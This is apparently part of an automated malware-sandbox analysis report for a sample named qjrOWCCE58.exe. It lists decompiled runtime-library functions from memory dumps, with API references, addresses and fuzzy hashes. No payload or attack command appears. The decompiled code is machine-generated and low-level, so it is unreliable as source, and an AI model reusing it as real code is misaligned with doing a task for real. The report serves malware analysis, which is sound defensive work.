Uniqueness Score: -1.00%

Function 00410594 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00410594(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x43b080 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E004118C0(_t13, __eflags,  *0x43b080);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E004118FB(_t14, __eflags,  *0x43b080, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00417C6E();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E004118FB(_t18, __eflags,  *0x43b080, 0);
								} else {
									_t8 = E004118FB(_t18, __eflags,  *0x43b080, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00414748(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00410594
0x0041059b
0x004105ae
0x004105b5
0x004105b7
0x004105b8
0x004105bb
0x004105d4
0x004105d4
0x004105bd
0x004105bd
0x004105bf
0x004105c9
0x004105d0
0x004105d2
0x004105d9
0x004105e2
0x004105e5
0x004105e6
0x004105e8
0x004105fc
0x004105fc
0x00410605
0x004105ea
0x004105f1
0x004105f7
0x004105f8
0x004105fa
0x0041060e
0x00410610
0x00410610
0x00000000
0x00000000
0x00000000
0x004105fa
0x00410613
0x00000000
0x00000000
0x00000000
0x004105d2
0x004105bf
0x0041061b
0x00410625
0x0041059d
0x0041059f
0x0041059f

APIs

GetLastError.KERNEL32(?,?,0041058B,0040E98F,0040DFC9), ref: 004105A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004105B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004105C9
SetLastError.KERNEL32(00000000,0041058B,0040E98F,0040DFC9), ref: 0041061B

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9a5f763d77b8c058f5afe47e90df7666e80adee94a4cc2970d922c5df92bc0ba
Instruction ID: 9435b5c555753474f336f4fe92c46eeff28c26ed2b5acef8ffa3a5ad60b35a66
Opcode Fuzzy Hash: 9a5f763d77b8c058f5afe47e90df7666e80adee94a4cc2970d922c5df92bc0ba
Instruction Fuzzy Hash: 1C01FC322093166E962437B56CC56EB2AA4EB41775730023FF260D11F1FF994CD1558C

Uniqueness

Uniqueness Score: -1.00%

Function 008307FB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008307F2,0082EBF6,0082E230), ref: 00830809
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00830817
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00830830
SetLastError.KERNEL32(00000000,008307F2,0082EBF6,0082E230), ref: 00830882

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9a5f763d77b8c058f5afe47e90df7666e80adee94a4cc2970d922c5df92bc0ba
Instruction ID: 6ce0fce289e89ebbcd024a39c65ae3e03f0b27ae7df99ff321cbf736545cc541
Opcode Fuzzy Hash: 9a5f763d77b8c058f5afe47e90df7666e80adee94a4cc2970d922c5df92bc0ba
Instruction Fuzzy Hash: 8001D8326093159EEA282ABCBC99A172654FBD5B74F200339F220C10E1FF554C0195C9

Uniqueness

Uniqueness Score: -1.00%

Function 0042240E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0042240E(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00418D67(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E0042669C(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E00411D34();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E0041CA2B(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E0042669C(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00422941(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E0041CA88(_t300);
														_t302 = _v12;
													}
													E0041CA88(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E0042669C(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00411D34();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x43b054; // 0x41d6575c
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E004298E0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E0041852B(_t244 - _t287 + 1, _t287,  &_v676, E004222E8(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E0042233F( &(_v608.cFileName),  &_v640,  &_v609, E004222E8(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E0041CA88(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E0041CA88(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E00414DB0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00422327);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E0041CA88(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E0040D3AF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E0041CA88(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E004298A0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E0041CA88( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E0041CA88(_t283);
						goto L31;
					}
				} else {
					_t219 = E00411DE1(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00411D07();
					L31:
					return _t297;
				}
				L81:
			}

0x00422413
0x00422416
0x00422419
0x0042241a
0x0042241c
0x00422432
0x00422436
0x00422439
0x0042243b
0x0042243d
0x0042243f
0x00422441
0x00422444
0x00422447
0x0042244a
0x0042244c
0x004224af
0x004224b1
0x004224b4
0x004224b6
0x004224ba
0x004224c3
0x004224c4
0x004224c7
0x004224c9
0x004224cc
0x004224d0
0x004224d0
0x004224d2
0x004224d4
0x004224d6
0x004224d8
0x004224d8
0x004224da
0x004224dd
0x004224e0
0x004224e0
0x004224e2
0x004224e3
0x004224e3
0x004224ee
0x004224f0
0x004224f3
0x004224f4
0x004224f7
0x004224f7
0x004224fb
0x004224fe
0x00422501
0x00422501
0x00422501
0x0042250e
0x00422510
0x00422513
0x00422515
0x0042252d
0x00422530
0x00422533
0x00422535
0x00422538
0x0042253a
0x0042253d
0x00422540
0x0042259d
0x004225a0
0x004225a3
0x004225a5
0x00000000
0x00422542
0x00422544
0x00422544
0x00422546
0x00422549
0x00422549
0x0042254b
0x0042254d
0x00422553
0x00422556
0x00422556
0x00422558
0x00422559
0x00422559
0x00422560
0x00422563
0x00422567
0x00422574
0x00422579
0x0042257c
0x0042257e
0x004225f2
0x004225f3
0x004225f4
0x004225f5
0x004225f6
0x004225f7
0x004225fc
0x00422600
0x00422602
0x00422603
0x00422606
0x00422606
0x00422609
0x00422609
0x0042260b
0x0042260c
0x0042260c
0x00422610
0x00422611
0x00422618
0x0042261b
0x0042261e
0x00422620
0x00422628
0x00422629
0x0042262a
0x0042262d
0x00422637
0x0042263b
0x0042263d
0x00422651
0x00422651
0x00422654
0x0042265e
0x00422663
0x00422666
0x00422668
0x00000000
0x0042266a
0x0042266a
0x0042266f
0x00422676
0x00422679
0x0042267b
0x0042268c
0x0042268e
0x00422690
0x00422690
0x00422690
0x0042267d
0x0042267e
0x00422683
0x00422686
0x00422695
0x0042269b
0x00000000
0x0042269e
0x0042263f
0x0042263f
0x00422645
0x0042264a
0x0042264d
0x0042264f
0x004226a1
0x004226a3
0x004226a4
0x004226a5
0x004226a6
0x004226a7
0x004226a8
0x004226ad
0x004226b0
0x004226b1
0x004226b3
0x004226b9
0x004226c0
0x004226c3
0x004226c6
0x004226c9
0x004226ca
0x004226cb
0x004226ce
0x004226d4
0x004226d6
0x004226d8
0x004226d8
0x004226da
0x004226dc
0x00000000
0x00000000
0x004226de
0x004226e0
0x004226e2
0x004226e4
0x004226ef
0x004226f1
0x004226f3
0x00000000
0x00000000
0x004226f3
0x004226e4
0x00000000
0x004226e0
0x004226f5
0x004226f5
0x004226fb
0x004226fd
0x00422703
0x00422705
0x00422727
0x00422727
0x00422729
0x0042272b
0x00422737
0x00422737
0x0042272d
0x0042272d
0x0042272f
0x00000000
0x00422731
0x00422731
0x00422733
0x00422735
0x00000000
0x00000000
0x00422735
0x0042272f
0x0042273f
0x00422747
0x0042274d
0x0042274e
0x00422750
0x00422758
0x0042275e
0x00422764
0x0042276a
0x0042277e
0x00422783
0x0042278e
0x0042279e
0x004227a4
0x004227a6
0x004227a9
0x004227cc
0x004227cc
0x004227d1
0x004227d7
0x004227d7
0x004227dd
0x004227e3
0x004227e9
0x004227ef
0x004227f5
0x00422816
0x0042281b
0x00422820
0x00422824
0x0042282a
0x0042282d
0x00422840
0x00422840
0x00422846
0x0042284c
0x0042284d
0x0042284e
0x00422853
0x00422856
0x0042285c
0x0042285e
0x004228bc
0x004228c2
0x004228ca
0x004228cf
0x004228d5
0x004228d6
0x00000000
0x00000000
0x00000000
0x0042282f
0x0042282f
0x00422832
0x00422834
0x00000000
0x00422836
0x00422836
0x00422839
0x00000000
0x0042283b
0x0042283b
0x0042283e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042283e
0x00422839
0x00422834
0x004228d8
0x004228d9
0x00000000
0x00422860
0x00422860
0x00422866
0x0042286e
0x00422873
0x00422882
0x00422882
0x0042288a
0x00422890
0x00422896
0x0042289d
0x004228a0
0x004228a2
0x004228b2
0x004228b7
0x00000000
0x004227ab
0x004227ab
0x004227b1
0x004227b2
0x004227b3
0x004227b4
0x004227bc
0x004227bc
0x004228df
0x004228df
0x004228e6
0x004228e7
0x004228ef
0x004228f4
0x004228f5
0x00422707
0x00422707
0x0042270a
0x0042270c
0x00422721
0x00000000
0x0042270e
0x0042270e
0x00422711
0x00422712
0x00422713
0x00422714
0x00422719
0x0042270c
0x004228fa
0x004228fb
0x004228fd
0x00422904
0x00000000
0x00000000
0x00000000
0x0042264f
0x00422622
0x00422624
0x00422625
0x00422627
0x00422627
0x00000000
0x00000000
0x00000000
0x00000000
0x00422580
0x00422580
0x00422586
0x00422589
0x0042258c
0x0042258f
0x00422592
0x00422595
0x00422598
0x00422598
0x00000000
0x00422549
0x00422517
0x00422517
0x0042251a
0x004225a7
0x004225a8
0x004225ad
0x00000000
0x004225ad
0x0042244e
0x0042244e
0x00422451
0x00422459
0x0042245c
0x00422463
0x00422465
0x00422467
0x00422482
0x00422483
0x00422484
0x00422485
0x0042248a
0x0042248d
0x00422490
0x00422469
0x00422469
0x0042246c
0x0042246d
0x0042246e
0x0042246f
0x00422470
0x00422475
0x00422477
0x0042247a
0x0042247a
0x00422492
0x00422494
0x00000000
0x00000000
0x0042249d
0x004224a0
0x004224a3
0x004224a5
0x004224a7
0x00000000
0x004224a9
0x004224a9
0x004224ac
0x00000000
0x004224ac
0x00000000
0x004224a7
0x00422522
0x004225ae
0x004225b1
0x004225b5
0x004225be
0x004225c1
0x004225c5
0x004225c5
0x004225c7
0x004225ca
0x004225cc
0x004225ce
0x004225d0
0x004225d5
0x004225d6
0x004225da
0x004225da
0x004225de
0x004225e1
0x004225e1
0x004225e5
0x00000000
0x004225ec
0x0042241e
0x0042241e
0x00422425
0x00422426
0x00422428
0x004225ed
0x004225f1
0x004225f1
0x00000000

APIs

_strpbrk.LIBCMT ref: 0042245C
_free.LIBCMT ref: 004225A8

Strings

*?, xrefs: 00422451

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: bcf5a499263052e0eccc113e4e324446ca35e8bf75f6d571304a6d8f7b8f9f02
Instruction ID: 4e2ecb3a065d362448f98065c3b5364f155b2c75f1bde3e6e42219bcf38ea6f9
Opcode Fuzzy Hash: bcf5a499263052e0eccc113e4e324446ca35e8bf75f6d571304a6d8f7b8f9f02
Instruction Fuzzy Hash: 26618E71E00229AFCF14DFA9D9815EEFBF5EF48310B64816AE805E7300D779AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00842675 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 008426C3
_free.LIBCMT ref: 0084280F

Strings

*?, xrefs: 008426B8

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: bcf5a499263052e0eccc113e4e324446ca35e8bf75f6d571304a6d8f7b8f9f02
Instruction ID: 2fb8d7544cf484c08c803a255903bf7983573e9c51d5b102cba2161c6aeba25a
Opcode Fuzzy Hash: bcf5a499263052e0eccc113e4e324446ca35e8bf75f6d571304a6d8f7b8f9f02
Instruction Fuzzy Hash: 58613AB5E042199FCF14DFA8C8815EEFBF5FF98314B25816AE815E7300E635AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00842C3A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\qjrOWCCE58.exe, xrefs: 00842C3F

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\qjrOWCCE58.exe
API String ID: 0-2443334656
Opcode ID: 4d11cb917334e1d329138796d2ce152fccfc30a26922fc59852ffa2902e7c68c
Instruction ID: 6ce9d8dc69379d63db1bae9a9df9fdfd10b9668ac2775453615dbb8c3f26d457
Opcode Fuzzy Hash: 4d11cb917334e1d329138796d2ce152fccfc30a26922fc59852ffa2902e7c68c
Instruction Fuzzy Hash: D521B07120822EAFDB20AB699CC096E77ADFF50364B518514F824D7190EB21EC4097E1

Uniqueness

Uniqueness Score: -1.00%

Function 00411767 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00411767(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x43c5f0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x42db48 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00414A84(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x0041176e
0x004117e2
0x00411773
0x00411775
0x0041177c
0x00411780
0x00411789
0x00411798
0x004117a1
0x004117a5
0x004117ee
0x004117f0
0x004117f4
0x004117f7
0x004117f7
0x004117fd
0x004117fd
0x004117e9
0x004117ed
0x004117ed
0x004117a7
0x004117b0
0x004117da
0x004117dd
0x004117df
0x004117df
0x00000000
0x004117df
0x004117b2
0x004117bd
0x004117c2
0x004117c7
0x00000000
0x00000000
0x004117ce
0x004117d4
0x004117d8
0x00000000
0x00000000
0x00000000
0x004117d8
0x00411785
0x00000000
0x00000000
0x00000000
0x00411787
0x004117e7
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00411828,?,?,0043C598,00000000,?,00411953,00000004,InitializeCriticalSectionEx,0042DC3C,InitializeCriticalSectionEx,00000000), ref: 004117F7

Strings

api-ms-, xrefs: 004117B7

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 12e0d5c35fc5f475c0f8e37e798e99a5f65e160c19565ba2099c2d81897eaa7b
Instruction ID: aa6e5366f7fb5321a7e43311705be75195062b46468d2b385a63ed577019a266
Opcode Fuzzy Hash: 12e0d5c35fc5f475c0f8e37e798e99a5f65e160c19565ba2099c2d81897eaa7b
Instruction Fuzzy Hash: CF11CA31B41225ABDF3157A89C81BDE7794AF01770F250122EA20F73E0D668FD4186DD

Uniqueness

Uniqueness Score: -1.00%

Function 004163C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
